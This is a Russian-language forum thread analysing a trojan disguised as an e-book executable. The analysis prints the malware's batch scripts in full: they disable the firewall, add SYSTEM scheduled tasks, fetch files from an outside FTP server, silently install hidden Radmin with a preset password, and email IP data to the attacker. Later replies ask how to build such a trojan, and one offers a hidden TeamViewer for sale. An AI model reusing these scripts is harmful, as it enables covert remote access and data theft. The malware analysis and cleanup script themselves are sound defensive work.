Текущее время: 07:00. Часовой пояс GMT +3.
Ваш баннер

Расширенный поиск
Вернуться   Все секреты безопасного общения в глобальной сети - icq-num.ru > Статьи > Наши статьи

Важная информация

Ответ
 
LinkBack Опции темы Опции просмотра
Старый 08.07.2011, 16:58   #1 ()
 
Аватар для onthar
Подробнее
Очки: 403, Уровень: 8
Очки: 403, Уровень: 8 Очки: 403, Уровень: 8 Очки: 403, Уровень: 8
Активность: 0%
Активность: 0% Активность: 0% Активность: 0%
 
По умолчанию Скрытый радмин + батник-лоадер. Анализ.

Скрытый радмин + батник-лоадер. Анализ.


Сегодня на форуме в личку прошло сообщение с просьбой проверить файл. Я согласился, любопытно же.
kak_ponyat_muzhchin_bibl.ru.exe (md5:2138A224BDDD1A36329F398A37E10AB9)
Хэш суммы я буду указывать только для вредоносных файлов.
В общем по описанию – это какая-то книга, почему в exe – непонятно, глядим далее.
Воспользуемся PEiD:

[Ссылки могут видеть только зарегистрированные пользователи. ]
UPX 0.89.6 – 1.02 / 1.05 – 2.90 (Delphi) stub -> Markus & Laszlo [RAR SFX]
Попробуем распаковать винраром, получим два файла:

filip_olegovich.exe
и setup.exe (md5:C888FCE716D600EE53D467F7DF2B2475)
[Ссылки могут видеть только зарегистрированные пользователи. ]

Оба упакованы в upx, после распаковки получим следующую картину:

[Ссылки могут видеть только зарегистрированные пользователи. ]

filip_olegovich.exe – собранный в exe pdf-файл, он нас более не интересует.
setup.exe (md5:732FCAA243C007DAA9354AEAF3F6D572) – компиллятор PureBasic 4.x -> Neil Hodgson *, что свойственно для конвертора bat-файлов в исполняемые exe.

Пока оба варианта подозрительного файла загружаются на вирустотал, поглядим ресурсы распакованного setup.exe:

[Ссылки могут видеть только зарегистрированные пользователи. ]

Да, это конвертированный батник, который создаст 2 файла и выполнит собственный бат код:
Код:
 
sc config schedule start= auto
sc start schedule
sc config wscsvc start= disabled
sc config SharedAccess start= disabled
sc stop wscsvc
sc stop SharedAccess
schtasks /create /tn «f» /sc minute /mo 1 /ru «NT AUTHORITY\SYSTEM» /tr %systemroot%/ff.bat
attrib +h %systemroot%/tasks/*.* netsh advfirewall set currentprofile state off
C:/isendsms_setup.exe
Этот батник запустит службу планировщика задач, остановит службы «центр обеспечения безопасности и оповещения системы безопасности» и «брэндмауэр windows» Далее добавит задание в планировщик, которое будет запускать файл ff.bat каждую минуту, скроет файл задания и снова отключит фаерволл.
Разработчик или параноик или диллетант, скорее – второе.

Проще говоря, этот файл setup.exe – экземпляр трояна- загрузчика (trojan-downloader), просто несколько импровезированный. Далее рассмотрим два указанных выше файла: Этот текст будет скопирован в %systemroot%/system.bin
Код:
 
u11631
javasc
get f.bat
del check.txt
bye
А такой код в %systemroot%/ff.bat
Код:
 
sc config wscsvc start= disabled
sc config SharedAccess start= disabled
sc stop wscsvc sc stop SharedAccess
ftp -s:C:\WINDOWS/system.bin ftp.on.ufanet.ru f.bat
%systemroot% – папка windows, в моем случае C:\windows

О чем это может нам сказать?
Прежде всего, файл system.bin – конфиг для фтп-клиента, который зайдет на сервер и скачает определенный файл. (Строки по очереди: логин от сервера, пароль, скачивание файла с сервера, удаление файла на сервере, завершение ftp-сессии)

Что делает файл ff.bat? Во первых останавливает и убирает из автозагрузки две службы: wscsvc - центр обеспечения безопасности и оповещения системы безопасности
SharedAccess - брэндмауэр windows Это не позволяет встроенному фаерволлу заблокировать дальнейшую сетевую активность, а так же блокирует оповещения о брешах в безопасности системы.

Далее поднимает подключение к фтп серверу ftp.on.ufanet.ru с настойками из файла system.bin. После завершения сессии фтп – выполнит файл f.ftp, который скачает с указанного сервера.


Наши файлы setup.exe, кстати, уже проанализировались на virustotal:
  • [Ссылки могут видеть только зарегистрированные пользователи. ]
  • [Ссылки могут видеть только зарегистрированные пользователи. ]
Дальше нам нужно получить файлы, которые должны были скачаться с фтп, для этого возьмем логин и пароль и подключимся самостоятельно:
f.bat
system.exe (md5:1ADEF54E08294BC7548C91C8F6CF2032) – RAR SFX архив с таким вот комментарием:
path=%SYSTEMROOT%/help/win32silent=1overwrite=1setup=install.batЭтот параметр разархивирует в тихом режиме содержимое архива в %SYSTEMROOT%/help/win32

[Ссылки могут видеть только зарегистрированные пользователи. ]

После распаковывания тем же самым раром получаем ни что иное, как сборку скрытого радмина второй версии:
[Ссылки могут видеть только зарегистрированные пользователи. ]
raddrv.dll и AdmDll.dll – драйвера Radmin 2
svchost.exe – исполняемый файл Radmin 2
Blat.* – файлы, пренадлежащие консольному почтовому клеинту blat
А вот эти файлы рассмотрим поподробней: install.bat
Код:
@echo off
sc config wscsvc start= disabled
sc stop wscsvc
sc config SharedAccess start= disabled
sc stop SharedAccess
sc config schedule start= auto
sc start schedule
svchost.exe /install /silence
svchost.exe /pass:12345678125 /save /silence
REG ADD HKLM\SYSTEM\RAdmin\v2.0\Server\Parameters /v DisableTrayIcon /t REG_BINARY /d 00000001 /f
REG ADD HKLM\SYSTEM\CurrentControlSet\Services\r_server /v DisplayName /t REG_SZ /d «Service Host Controller» /f
svchost.exe /stop
svchost.exe /start
blat.exe -install -server smtp.yandex.ru -port 587 -f [Ссылки могут видеть только зарегистрированные пользователи. ] -u ufanetcom2 -pw javascriptsc
schtasks /create /tn «security» /sc minute /mo 15 /ru «NT AUTHORITY\SYSTEM» /tr %SYSTEMROOT%/help/win32/microsoft.bat
attrib +h %systemroot%/tasks/*.*
exit
Разберем комманды по порядку. Прежде всего очередное отключение брэндмауэра и оповещений безопасности, затем повторный запуск службы планировщика задач. Далее – самое вкусное, запуск серверной части Radmin с параметрами, включающими тихую установку, предустановленный пароль а так же запись в реестр параметров сокрытия значка в трее жертвы. Второй ключ задаст имя службы радмина – Service Host Controller
Ну и окончание – запуск самой службы. Таким образом на скомпрометированной системе установлен Radmin с предустановленным паролем и все возможным сокрытием. Далее мы видим запись в реестр данных для отправки почты с помощью почтового клиента blat и добавление всего этого бат-файла в автозагрузку через планировщик заданий. microsoft.bat
Код:
sc config SharedAccess start= disabled
sc stop SharedAccess
ipconfig /all>%SYSTEMROOT%\Help\win32/ip.txt
%SYSTEMROOT%/help/win32/blat.exe
%systemroot%/help/win32/ip.txt -to [Ссылки могут видеть только зарегистрированные пользователи. ]
exit
Второй батник уже в который раз отключает системный фаерволл, а так же выполняет команду ipconfig /all с сохранением вывода в текстовый файл, который в дальнейшем отправится с помощью blat по адресу [Ссылки могут видеть только зарегистрированные пользователи. ], короче говоря – отправит ip-адрес для подключения злоумышленника к инфицированной машине.

На этом, в общем-то, все, анализ закончен. Анализ совершенно статичен, запускать в виртуальной среде ничего не пришлось, все банально. Но тем не менее, зайдя на почту я видел большое количество писем с ip-адресами жертв. Ниже будет приведен скрипт AVZ для лечения системы.
Код:
begin
SearchRootkit(true, true);
SetAVZGuardStatus(True);
StopService('r_server');
DeleteService('r_server', true );
TerminateProcessByName('c:\windows\help\win32\svchost.exe');
DeleteFile('C:\WINDOWS\ff.bat');
DeleteFile('C:\WINDOWS\SYSTEM.DLL');
DeleteFileMask('C:\WINDOWS\help\win32', '*.*', true);
BC_ImportAll;
ExecuteSysClean;
ExecuteWizard('TSW',2,3,true);
BC_Activate;RebootWindows(true);
end.
onthar вне форума

 
Ответить с цитированием
Сказали спасибо:
Вадим , dikobraz , ZERO COOL , Max_333 , Absenta , guron , DeAtH , -=ExE=- , ZT. , Хулиган , LiLi
Старый 30.07.2011, 12:37   #2 ()
 
Аватар для anthrax
Подробнее
Очки: 817, Уровень: 15
Очки: 817, Уровень: 15 Очки: 817, Уровень: 15 Очки: 817, Уровень: 15
Активность: 1%
Активность: 1% Активность: 1% Активность: 1%


 
По умолчанию

onthar Благодарю, был знаком так сказать с данной темой, подробностей не расскажу, но скажу только то что почистили хорошо, так что будьте осторожнее и проверяйте своих друзей, особенно если они решили передать вам что-то в формате .exe, кстати onthar не подскажешь ли, как такую штуку самому собрать?
__________________
[Ссылки могут видеть только зарегистрированные пользователи. ]
anthrax вне форума

 
Ответить с цитированием
Старый 30.07.2011, 16:45   #3 ()
 
Аватар для ZERO COOL
Подробнее
Очки: 4, Уровень: 1
Очки: 4, Уровень: 1 Очки: 4, Уровень: 1 Очки: 4, Уровень: 1
Активность: 0%
Активность: 0% Активность: 0% Активность: 0%
 
По умолчанию

Т.е. Можно это дело собрать на свою пользу? спасибо
ZERO COOL вне форума

 
Ответить с цитированием
Старый 30.07.2011, 17:00   #4 ()
 
Аватар для Хулиган
Подробнее
Очки: 902, Уровень: 16
Очки: 902, Уровень: 16 Очки: 902, Уровень: 16 Очки: 902, Уровень: 16
Активность: 0%
Активность: 0% Активность: 0% Активность: 0%
 
По умолчанию

про настройку и установку сборки скрытого радмина,писал Индиго,на xaker.name
Хулиган вне форума

 
Ответить с цитированием
Старый 30.07.2011, 17:21   #5 ()
 
Аватар для ZERO COOL
Подробнее
Очки: 4, Уровень: 1
Очки: 4, Уровень: 1 Очки: 4, Уровень: 1 Очки: 4, Уровень: 1
Активность: 0%
Активность: 0% Активность: 0% Активность: 0%
 
По умолчанию

Нет)))) я помню эту тему, точь в точь на грабе, и не спорь)))))) даже афтор тот же
ZERO COOL вне форума

 
Ответить с цитированием
Старый 30.07.2011, 17:56   #6 ()
 
Аватар для anthrax
Подробнее
Очки: 817, Уровень: 15
Очки: 817, Уровень: 15 Очки: 817, Уровень: 15 Очки: 817, Уровень: 15
Активность: 1%
Активность: 1% Активность: 1% Активность: 1%


 
По умолчанию

ZERO COOL не советую, бог шельму метит, это слишком серьёзно, так как этот софт уже не для школоты, а зачем своих трогать?!
__________________
[Ссылки могут видеть только зарегистрированные пользователи. ]
anthrax вне форума

 
Ответить с цитированием
Старый 30.07.2011, 18:27   #7 ()
 
Аватар для Monah
Подробнее
Очки: 55, Уровень: 1
Очки: 55, Уровень: 1 Очки: 55, Уровень: 1 Очки: 55, Уровень: 1
Активность: 0%
Активность: 0% Активность: 0% Активность: 0%
 
По умолчанию

Цитата: Сообщение от ZERO COOL
Т.е. Можно это дело собрать на свою пользу? спасибо
Можно только осторожно. Есть и другие проги собраные под админ управления.
Радмин щас такой версии уже палится сильно.
Да про сборку писал Iindigo на ХН.
Это несколько другая версия описана в этой теме.
Monah вне форума

 
Ответить с цитированием
Старый 31.07.2011, 02:50   #8 ()
 
Аватар для onthar
Подробнее
Очки: 403, Уровень: 8
Очки: 403, Уровень: 8 Очки: 403, Уровень: 8 Очки: 403, Уровень: 8
Активность: 0%
Активность: 0% Активность: 0% Активность: 0%
 
По умолчанию

Цитата: Сообщение от ZERO COOL
Нет)))) я помню эту тему, точь в точь на грабе, и не спорь)))))) даже афтор тот же
Действительно, Индиго и я в том числе, писали про сборки скрытого радмина как второй версии, так и третьей. Сейчас полно разных модификаций просто.

Как создать трояна из этого поста я напишу позже, хотя и так все вроде бы очевидно.
onthar вне форума

 
Ответить с цитированием
Старый 25.01.2012, 16:23   #9 ()
 
Аватар для vicind
Подробнее
Очки: 3, Уровень: 1
Очки: 3, Уровень: 1 Очки: 3, Уровень: 1 Очки: 3, Уровень: 1
Активность: 0%
Активность: 0% Активность: 0% Активность: 0%
 
По умолчанию

Могу предложить скрытый TeamViewer, ему пофиг роутеры и ip - он использует ID Стучите в Аську 365911818
vicind вне форума

 
Ответить с цитированием
Старый 25.01.2012, 16:30   #10 ()
 
Аватар для onthar
Подробнее
Очки: 403, Уровень: 8
Очки: 403, Уровень: 8 Очки: 403, Уровень: 8 Очки: 403, Уровень: 8
Активность: 0%
Активность: 0% Активность: 0% Активность: 0%
 
По умолчанию

vicind, такое есть в паблике, причем несколько вариантов, так что не надо тут барыжить ;)
__________________
[Ссылки могут видеть только зарегистрированные пользователи. ]
onthar вне форума

 
Ответить с цитированием
Сказали спасибо:
doonn
Старый 03.03.2012, 19:55   #11 ()
 
Аватар для vicind
Подробнее
Очки: 3, Уровень: 1
Очки: 3, Уровень: 1 Очки: 3, Уровень: 1 Очки: 3, Уровень: 1
Активность: 0%
Активность: 0% Активность: 0% Активность: 0%
 
По умолчанию

К сожалению TeamViewer уже палится антивирями! Там палится tv.dll
vicind вне форума

 
Ответить с цитированием
Старый 03.03.2012, 23:24   #12 ()
 
Аватар для anthrax
Подробнее
Очки: 817, Уровень: 15
Очки: 817, Уровень: 15 Очки: 817, Уровень: 15 Очки: 817, Уровень: 15
Активность: 1%
Активность: 1% Активность: 1% Активность: 1%


 
По умолчанию

Цитата: Сообщение от vicind
К сожалению TeamViewer уже палится антивирями! Там палится tv.dll
Впервые об этом слышу, на сколько я знаю TeamViewer это софт от Microsoft
__________________
[Ссылки могут видеть только зарегистрированные пользователи. ]
anthrax вне форума

 
Ответить с цитированием
Старый 05.03.2012, 18:32   #13 ()
 
Аватар для Harry123
Подробнее
Очки: 15, Уровень: 1
Очки: 15, Уровень: 1 Очки: 15, Уровень: 1 Очки: 15, Уровень: 1
Активность: 5%
Активность: 5% Активность: 5% Активность: 5%
 
По умолчанию

Цитата: Сообщение от anthrax
Впервые об этом слышу, на сколько я знаю TeamViewer это софт от Microsoft
он говорит о модифицированном, скрытом
Harry123 вне форума

 
Ответить с цитированием
 

Ответ

Опции темы
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.
Trackbacks are Вкл.
Pingbacks are Вкл.
Refbacks are Вкл.

Быстрый переход

Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Скрытый telnet доступ к Windows ga1Do4ok Чужие статьи 1 07.02.2012 08:31


icq-num team




 
 
Материалы, находящиеся на этом ресурсе, были добавлены пользователями сайта, либо найдены в интернете как свободно распространяемые. Если Вы являетесь законным правообладателем той или иной продукции, и условия, на которых она представлена на данном ресурсе, не соответствует действительности, просьба незамедлительно связаться с администрацией сайта с целью устранения правонарушения. Все материалы доступны исключительно для личного пользования в ознакомительных целях и не должны использоваться для последующего распространения или получения коммерческой выгоды. За информацию в рекламных новостях или объявлениях ответственность несет рекламодатель! Копирование авторской информации разрешено лишь с разрешения администрации сайта, с указанием активной гиперссылки на icq-num.ru, как на первоисточник.